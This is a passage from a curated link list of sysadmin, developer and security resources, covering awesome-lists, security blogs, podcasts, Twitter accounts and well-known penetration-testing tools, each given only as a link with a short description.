database</b></a> - evaluate how fucked your database is with this handy website.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://krisbuytaert.be/blog/linux-troubleshooting-101-2016-edition/index.html"><b>Linux Troubleshooting 101 , 2016 Edition</b></a> - everything is a DNS Problem...<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://open.buffer.com/5-whys-process/"><b>Five Whys</b></a> - you know what the problem is, but you cannot solve it?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gvnshtn.com/maersk-me-notpetya/"><b>Maersk, me & notPetya</b></a> - how did ransomware successfully hijack hundreds of domain controllers?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://howhttps.works/"><b>howhttps.works</b></a> - how HTTPS works ...in a comic!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://howdns.works/"><b>howdns.works</b></a> - a fun and colorful explanation of how DNS works.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://postgresqlco.nf/en/doc/param/"><b>POSTGRESQLCO.NF</b></a> - your postgresql.conf documentation and recommendations.<br> </p> #### Inspiring Lists &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: SysOps/DevOps <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/kahun/awesome-sysadmin"><b>Awesome Sysadmin</b></a> - amazingly awesome open source sysadmin resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/alebcay/awesome-shell"><b>Awesome Shell</b></a> - awesome command-line frameworks, toolkits, guides and gizmos.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/learnbyexample/Command-line-text-processing"><b>Command-line-text-processing</b></a> - finding text to search and replace, sorting to beautifying, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/caesar0301/awesome-pcaptools"><b>Awesome Pcaptools</b></a> - collection of tools developed by other researchers to process network traces.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zoidbergwill/awesome-ebpf"><b>awesome-ebpf</b></a> - a curated list of awesome projects related to eBPF.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/leandromoreira/linux-network-performance-parameters"><b>Linux Network Performance</b></a> - where some of the network sysctl variables fit into the Linux/Kernel network flow.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dhamaniasad/awesome-postgres"><b>Awesome Postgres</b></a> - list of awesome PostgreSQL software, libraries, tools and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/enochtangg/quick-SQL-cheatsheet"><b>quick-SQL-cheatsheet</b></a> - a quick reminder of all SQL queries and examples on how to use them.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Kickball/awesome-selfhosted"><b>Awesome-Selfhosted</b></a> - list of Free Software network services and web applications which can be hosted locally.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.archlinux.org/index.php/List_of_applications"><b>List of applications</b></a> - huge list of apps sorted by category, as a reference for those looking for packages.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/InterviewMap/CS-Interview-Knowledge-Map"><b>CS-Interview-Knowledge-Map</b></a> - build the best interview map.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Tikam02/DevOps-Guide"><b>DevOps-Guide</b></a> - DevOps Guide from basic to advanced with Interview Questions and Notes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://issue.freebsdfoundation.org/publication/?m=33057&l=1&view=issuelistBrowser"><b>FreeBSD Journal</b></a> - it is a great list of periodical magazines about FreeBSD and other important things.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bregman-arie/devops-interview-questions"><b>devops-interview-questions</b></a> - contains interview questions on various DevOps and SRE related topics.<br></p> ##### :black_small_square: Developers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/kamranahmedse/developer-roadmap"><b>Web Developer Roadmap</b></a> - roadmaps, articles and resources to help you choose your path, learn and improve.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/thedaviddias/Front-End-Checklist"><b>Front-End-Checklist</b></a> - the perfect Front-End Checklist for modern websites and meticulous developers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/thedaviddias/Front-End-Performance-Checklist"><b>Front-End-Performance-Checklist</b></a> - the only Front-End Performance Checklist that runs faster than the others.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://rszalski.github.io/magicmethods/"><b>Python's Magic Methods</b></a> - what are magic methods? They're everything in object-oriented Python.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/satwikkansal/wtfpython"><b>wtfpython</b></a> - a collection of surprising Python snippets and lesser-known features.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/twhite96/js-dev-reads"><b>js-dev-reads</b></a> - a list of books and articles for the discerning web developer to read.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/RomuloOliveira/commit-messages-guide"><b>Commit messages guide</b></a> - a guide to understand the importance of commit messages.<br> </p> ##### :black_small_square: Security/Pentesting <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/qazbnm456/awesome-web-security"><b>Awesome Web Security</b></a> - a curated list of Web Security materials and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/joe-shenouda/awesome-cyber-skills"><b>awesome-cyber-skills</b></a> - a curated list of hacking environments where you can train your cyber skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/devsecops/awesome-devsecops"><b>awesome-devsecops</b></a> - an authoritative list of awesome devsecops tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jivoi/awesome-osint"><b>awesome-osint</b></a> - is a curated list of amazingly awesome OSINT.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/hslatman/awesome-threat-intelligence"><b>awesome-threat-intelligence</b></a> - a curated list of Awesome Threat Intelligence resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/infosecn1nja/Red-Teaming-Toolkit"><b>Red-Teaming-Toolkit</b></a> - a collection of open source and commercial tools that aid in red team operations.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/snoopysecurity/awesome-burp-extensions"><b>awesome-burp-extensions</b></a> - a curated list of amazingly awesome Burp Extensions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Hack-with-Github/Free-Security-eBooks"><b>Free Security eBooks</b></a> - list of a Free Security and Hacking eBooks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/yeahhub/Hacking-Security-Ebooks"><b>Hacking-Security-Ebooks</b></a> - top 100 Hacking & Security E-Books.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/nikitavoloboev/privacy-respecting"><b>privacy-respecting</b></a> - curated list of privacy respecting services and software.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/wtsxDev/reverse-engineering"><b>reverse-engineering</b></a> - list of awesome reverse engineering resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/michalmalik/linux-re-101"><b>linux-re-101</b></a> - a collection of resources for linux reverse engineering.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/onethawt/reverseengineering-reading-list"><b>reverseengineering-reading-list</b></a> - a list of Reverse Engineering articles, books, and papers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/0xInfection/Awesome-WAF"><b>Awesome-WAF</b></a> - a curated list of awesome web-app firewall (WAF) stuff.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jakejarvis/awesome-shodan-queries"><b>awesome-shodan-queries</b></a> - interesting, funny, and depressing search queries to plug into shodan.io.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/danielmiessler/RobotsDisallowed"><b>RobotsDisallowed</b></a> - a curated list of the most common and most interesting robots.txt disallowed directories.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Kayzaks/HackingNeuralNetworks"><b>HackingNeuralNetworks</b></a> - is a small course on exploiting and defending neural networks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gist.github.com/joepie91/7e5cad8c0726fd6a5e90360a754fc568"><b>wildcard-certificates</b></a> - why you probably shouldn't use a wildcard certificate.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gist.github.com/joepie91/5a9909939e6ce7d09e29"><b>Don't use VPN services</b></a> - which is what every third-party "VPN provider" does.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/InQuest/awesome-yara"><b>awesome-yara</b></a> - a curated list of awesome YARA rules, tools, and people.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/drduh/macOS-Security-and-Privacy-Guide"><b>macOS-Security-and-Privacy-Guide</b></a> - guide to securing and improving privacy on macOS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/PaulSec/awesome-sec-talks"><b>awesome-sec-talks</b></a> - is a collected list of awesome security talks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/k4m4/movies-for-hackers"><b>Movies for Hackers</b></a> - list of movies every hacker & cyberpunk must watch.<br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.cheatography.com/"><b>Cheatography</b></a> - over 3,000 free cheat sheets, revision aids and quick references.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mre/awesome-static-analysis"><b>awesome-static-analysis</b></a> - static analysis tools for all programming languages.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ossu/computer-science"><b>computer-science</b></a> - path to a free self-taught education in Computer Science.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/danluu/post-mortems"><b>post-mortems</b></a> - is a collection of postmortems (config errors, hardware failures, and more).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/danistefanovic/build-your-own-x"><b>build-your-own-x</b></a> - build your own (insert technology here).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rby90/Project-Based-Tutorials-in-C"><b>Project-Based-Tutorials-in-C</b></a> - is a curated list of project-based tutorials in C.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/kylelobo/The-Documentation-Compendium"><b>The-Documentation-Compendium</b></a> - various README templates & tips on writing high-quality documentation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mahmoud/awesome-python-applications"><b>awesome-python-applications</b></a> - free software that works great, and also happens to be open-source Python.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/awesomedata/awesome-public-datasets"><b>awesome-public-datasets</b></a> - a topic-centric list of HQ open datasets.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Sahith02/machine-learning-algorithms"><b>machine-learning-algorithms</b></a> - a curated list of all machine learning algorithms and concepts.<br> </p> #### Blogs/Podcasts/Videos &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: SysOps/DevOps <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/watch?v=nAFpkV5-vuI"><b>Varnish for PHP developers</b></a> - very interesting presentation of Varnish by Mattias Geniar.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/watch?v=CZ3wIuvmHeM"><b>A Netflix Guide to Microservices</b></a> - alks about the chaotic and vibrant world of microservices at Netflix.<br> </p> ##### :black_small_square: Developers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/watch?v=yOyaJXpAYZQ"><b>Comparing C to machine lang</b></a> - compare a simple C app with the compiled machine code of that program.<br> </p> ##### :black_small_square: Geeky Persons <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.brendangregg.com/"><b>Brendan Gregg's Blog</b></a> - is an industry expert in computing performance and cloud computing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gynvael.coldwind.pl/"><b>Gynvael "GynDream" Coldwind</b></a> - is a IT security engineer at Google.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://lcamtuf.coredump.cx/"><b>Michał "lcamtuf" Zalewski</b></a> - white hat hacker, computer security expert.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ma.ttias.be/"><b>Mattias Geniar</b></a> - developer, sysadmin, blogger, podcaster and public speaker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nickcraver.com/"><b>Nick Craver</b></a> - software developer and systems administrator for Stack Exchange.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://scotthelme.co.uk/"><b>Scott Helme</b></a> - security researcher, international speaker and founder of securityheaders.com and report-uri.com.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://krebsonsecurity.com/"><b>Brian Krebs</b></a> - The Washington Post and now an Independent investigative journalist.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.schneier.com/"><b>Bruce Schneier</b></a> - is an internationally renowned security technologist, called a "security guru".<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://chrissymorgan.co.uk/"><b>Chrissy Morgan</b></a> - advocate of practical learning, Chrissy also takes part in bug bounty programs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.zsec.uk/"><b>Andy Gill</b></a> - is a hacker at heart who works as a senior penetration tester.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://danielmiessler.com/"><b>Daniel Miessler</b></a> - cybersecurity expert and writer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://samy.pl/"><b>Samy Kamkar</b></a> - is an American privacy and security researcher, computer hacker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.j4vv4d.com/"><b>Javvad Malik</b></a> - is a security advocate at AlienVault, a blogger event speaker and industry commentator.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.grahamcluley.com/"><b>Graham Cluley</b></a> - public speaker and independent computer security analyst.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://security.szurek.pl/"><b>Kacper Szurek</b></a> - detection engineer at ESET.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.troyhunt.com/"><b>Troy Hunt</b></a> - web security expert known for public education and outreach on security topics.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://raymii.org/s/index.html"><b>raymii.org</b></a> - sysadmin specializing in building high availability cloud environments.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://robert.penz.name/"><b>Robert Penz</b></a> - IT security expert.<br> </p> ##### :black_small_square: Geeky Blogs <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://linux-audit.com/"><b>Linux Audit</b></a> - the Linux security blog about auditing, hardening and compliance by Michael Boelen.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://linuxsecurity.expert/"><b> Linux Security Expert</b></a> - trainings, howtos, checklists, security tools, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.grymoire.com/"><b>The Grymoire</b></a> - collection of useful incantations for wizards, be you computer wizards, magicians, or whatever.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.secjuice.com"><b>Secjuice</b></a> - is the only non-profit, independent and volunteer led publication in the information security space.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://duo.com/decipher"><b>Decipher</b></a> - security news that informs and inspires.<br> </p> ##### :black_small_square: Geeky Vendor Blogs <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tenable.com/podcast"><b>Tenable Podcast</b></a> - conversations and interviews related to Cyber Exposure, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nakedsecurity.sophos.com/"><b>Sophos</b></a> - threat news room, giving you news, opinion, advice and research on computer security issues.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tripwire.com/state-of-security/"><b>Tripwire State of Security</b></a> - blog featuring the latest news, trends and insights on current security issues.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.malwarebytes.com/"><b>Malwarebytes Labs Blog</b></a> - security blog aims to provide insider news about cybersecurity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.trustedsec.com/category/articles/"><b>TrustedSec</b></a> - latest news, and trends about cybersecurity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://portswigger.net/blog"><b>PortSwigger Web Security Blog</b></a> - about web app security vulns and top tips from our team of web security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.alienvault.com/blogs"><b>AT&T Cybersecurity blog</b></a> - news on emerging threats and practical advice to simplify threat detection.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://thycotic.com/company/blog/"><b>Thycotic</b></a> - where CISOs and IT Admins come to learn about industry trends, IT security, and more.<br> </p> ##### :black_small_square: Geeky Cybersecurity Podcasts <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://risky.biz/netcasts/risky-business/"><b>Risky Business</b></a> - is a weekly information security podcast featuring news and in-depth interviews.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.vice.com/en_us/topic/cyber"><b>Cyber, by Motherboard</b></a> - stories, and focus on the ideas about cybersecurity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tenable.com/podcast"><b>Tenable Podcast</b></a> - conversations and interviews related to Cyber Exposure, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://podcasts.apple.com/gb/podcast/cybercrime-investigations/id1428801405"><b> Cybercrime Investigations</b></a> - podcast by Geoff White about cybercrimes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://themanyhats.club/tag/episodes/"><b>The many hats club</b></a> - featuring stories from a wide range of Infosec people (Whitehat, Greyhat and Blackhat).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://darknetdiaries.com/"><b>Darknet Diaries</b></a> - true stories from the dark side of the Internet.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/playlist?list=PL423I_gHbWUXah3dmt_q_XNp0NlGAKjis"><b>OSINTCurious Webcasts</b></a> - is the investigative curiosity that helps people be successful in OSINT.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/user/SecurityWeeklyTV"><b>Security Weekly</b></a> - the latest information security and hacking news.<br> </p> ##### :black_small_square: Geeky Cybersecurity Video Blogs <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/channel/UCzvJStjySZVvOBsPl-Vgj0g"><b>rev3rse security</b></a> - offensive, binary exploitation, web app security, vulnerability, hardening, red team, blue team.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w"><b>LiveOverflow</b></a> - a lot more advanced topics than what is typically offered in paid online courses - but for free.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/infoseccynic"><b>J4vv4D</b></a> - the important information regarding our internet security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cybertalks.co.uk/"><b> CyberTalks</b></a> - talks, interviews, and article about cybersecurity.<br> </p> ##### :black_small_square: Best Personal Twitter Accounts <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/blackroomsec"><b>@blackroomsec</b></a> - a white-hat hacker/pentester. Intergalactic Minesweeper Champion 1990.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/MarcoCiappelli"><b>@MarcoCiappelli</b></a> - Co-Founder @ITSPmagazine, at the intersection of IT security and society.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/binitamshah"><b>@binitamshah</b></a> - Linux Evangelist. Malwares. Kernel Dev. Security Enthusiast.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/joe_carson"><b>@joe_carson</b></a> - an InfoSec Professional and Tech Geek.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/mikko"><b>@mikko</b></a> - CRO at F-Secure, Reverse Engineer, TED Speaker, Supervillain.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/esrtweet"><b>@esrtweet</b></a> - often referred to as ESR, is an American software developer, and open-source software advocate.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/gynvael"><b>@gynvael</b></a> - security researcher/programmer, @DragonSectorCTF founder/player, technical streamer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/x0rz"><b>@x0rz</b></a> - Security Researcher & Cyber Observer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/hasherezade"><b>@hasherezade</b></a> - programmer, malware analyst. Author of PEbear, PEsieve, libPeConv.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/TinkerSec"><b>@TinkerSec</b></a> - tinkerer, cypherpunk, hacker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/alisaesage"><b>@alisaesage</b></a> - independent hacker and researcher.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/SwiftOnSecurity"><b>@SwiftOnSecurity</b></a> - systems security, industrial safety, sysadmin, author of decentsecurity.com.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/dakami"><b>@dakami</b></a> - is one of just seven people with the authority to restore the DNS root keys.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/samykamkar"><b>@samykamkar</b></a> - is a famous "grey hat" hacker, security researcher, creator of the MySpace "Samy" worm.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/securityweekly"><b>@securityweekly</b></a> - founder & CTO of Security Weekly podcast network.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/jack_daniel"><b>@jack_daniel</b></a> - @SecurityBSides co-founder.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/thegrugq"><b>@thegrugq</b></a> - Security Researcher.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/matthew_d_green"><b>@matthew_d_green</b></a> - a cryptographer and professor at Johns Hopkins University.<br> </p> ##### :black_small_square: Best Commercial Twitter Accounts <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/haveibeenpwned"><b>@haveibeenpwned</b></a> - check if you have an account that has been compromised in a data breach.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/bugcrowd"><b>@bugcrowd</b></a> - trusted by more of the Fortune 500 than any other crowdsourced security platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/Malwarebytes"><b>@Malwarebytes</b></a> - most trusted security company. Unmatched threat visibility.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/sansforensics"><b>@sansforensics</b></a> - the world's leading Digital Forensics and Incident Response provider.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/attcyber"><b>@attcyber</b></a> - AT&T Cybersecurity’s Edge-to-Edge technologies provide threat intelligence, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/TheManyHatsClub"><b>@TheManyHatsClub</b></a> - an information security focused podcast and group of individuals from all walks of life.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/hedgehogsec"><b>@hedgehogsec</b></a> - Hedgehog Cyber. Gibraltar and Manchester's top boutique information security firm.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/NCSC"><b>@NCSC</b></a> - the National Cyber Security Centre. Helping to make the UK the safest place to live and work online.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/Synacktiv"><b>@Synacktiv</b></a> - IT security experts.<br> </p> ##### :black_small_square: A piece of history <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://ftp.arl.army.mil/~mike/howto/"><b>How to Do Things at ARL</b></a> - how to configure modems, scan images, record CD-ROMs, and other.<b>*</b><br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/watch?v=3QnD2c4Xovk"><b>Diffie-Hellman Key Exchange (short version)</b></a> - how Diffie-Hellman Key Exchange worked.<br> </p> #### Hacking/Penetration Testing &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Pentesters arsenal tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.syhunt.com/sandcat/"><b>Sandcat Browser</b></a> - a penetration-oriented browser with plenty of advanced functionality already built in.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.metasploit.com/"><b>Metasploit</b></a> - tool and framework for pentesting system, web and many more, contains a lot a ready to use exploit.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://portswigger.net/burp"><b>Burp Suite</b></a> - tool for testing web app security, intercepting proxy to replay, inject, scan and fuzz HTTP requests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project"><b>OWASP Zed Attack Proxy</b></a> - intercepting proxy to replay, inject, scan and fuzz HTTP requests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://w3af.org/"><b>w3af</b></a> - is a Web Application Attack and Audit Framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://mitmproxy.org/"><b>mitmproxy</b></a> - an interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cirt.net/Nikto2"><b>Nikto2</b></a> - web server scanner which performs comprehensive tests against web servers for multiple items.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://sqlmap.org/"><b>sqlmap</b></a> - tool that automates the process of detecting and exploiting SQL injection flaws.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/lanmaster53/recon-ng"><b>Recon-ng</b></a> - is a full-featured Web Reconnaissance framework written in Python.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Tib3rius/AutoRecon"><b>AutoRecon</b></a> - is a network reconnaissance tool which performs automated enumeration of services.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.faradaysec.com/"><b>Faraday</b></a> - an Integrated Multiuser Pentest Environment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/s0md3v/Photon"><b>Photon</b></a> - incredibly fast crawler designed for OSINT.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/s0md3v/XSStrike"><b>XSStrike</b></a> - most advanced XSS detection suite.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/1N3/Sn1per"><b>Sn1per</b></a> - automated pentest framework for offensive security experts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/future-architect/vuls"><b>vuls</b></a> - is an agent-less vulnerability scanner for Linux, FreeBSD, and other.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/tsunami-security-scanner"><b>tsunami</b></a> - is a general purpose network security scanner with an extensible plugin system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/michenriksen/aquatone"><b>aquatone</b></a> - a tool for domain flyovers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/GitHackTools/BillCipher"><b>BillCipher</b></a> - information gathering tool for a website or IP address.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Ekultek/WhatWaf"><b>WhatWaf</b></a> - detect and bypass web application firewalls and protection systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/s0md3v/Corsy"><b>Corsy</b></a> - CORS misconfiguration scanner.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/evyatarmeged/Raccoon"><b>Raccoon</b></a> - is a high performance offensive security tool for reconnaissance and vulnerability scanning.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Nekmo/dirhunt"><b>dirhunt</b></a> - find web directories without bruteforce.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.openwall.com/john/"><b>John The Ripper</b></a> - is a fast password cracker, currently available for many flavors of Unix, Windows, and other.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hashcat.net/hashcat/"><b>hashcat</b></a> - world's fastest and most advanced password recovery utility.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://lcamtuf.coredump.cx/p0f3/"><b>p0f</b></a> - is a tool to identify the players behind any incidental TCP/IP communications.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mozilla/ssh_scan"><b>ssh_scan</b></a> - a prototype SSH configuration and policy scanner.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/woj-ciech/LeakLooker"><b>LeakLooker</b></a> - find open databases - powered by Binaryedge.io<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/offensive-security/exploitdb"><b>exploitdb</b></a> - searchable archive from The Exploit Database.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/vulnersCom/getsploit"><b>getsploit</b></a> - is a command line utility for searching and downloading exploits.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zardus/ctf-tools"><b>ctf-tools</b></a> - some setup scripts for security research tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Gallopsled/pwntools"><b>pwntools</b></a> - CTF framework and exploit development library.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bl4de/security-tools"><b>security-tools</b></a> - collection of small security tools created mostly in Python. CTFs, pentests and so on.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/leonteale/pentestpackage"><b>pentestpackage</b></a> - is a package of Pentest scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dloss/python-pentest-tools"><b>python-pentest-tools</b></a> - python tools for penetration testers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/fuzzdb-project/fuzzdb"><b>fuzzdb</b></a> - dictionary of attack patterns and primitives for black-box application fault injection.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/AFL"><b>AFL</b></a> - is a free software fuzzer maintained 